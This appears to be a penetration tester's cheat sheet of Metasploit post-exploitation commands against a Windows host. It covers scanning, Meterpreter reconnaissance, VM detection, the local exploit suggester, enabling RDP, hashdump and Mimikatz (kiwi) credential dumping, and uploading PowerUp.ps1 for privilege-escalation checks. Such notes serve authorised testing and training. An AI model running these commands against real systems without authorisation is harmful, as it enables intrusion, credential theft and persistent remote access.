Metasploit

# Nmap scan
db_nmap -sV [IP]

hosts
services
vulns

sessions -i [session_id]

meterpreter > getuid
meterpreter > getprivs
meterpreter > sysinfo
meterpreter > ipconfig

# VM ?
meterpreter > run post/windows/gather/checkvm

# Exploit ?
meterpreter > run post/multi/recon/local_exploit_suggester 

# Enable RDP 
meterpreter > run post/windows/manage/enable_rdp

meterpreter > hashdump

#Mimikatz
load kiwi

#PowerShell > PowerUp

meterpreter > upload /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1
[*] uploading  : /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 483.72 KiB of 483.72 KiB (100.0%): /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded   : /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
PreviousLinuxNextBasics

Last updated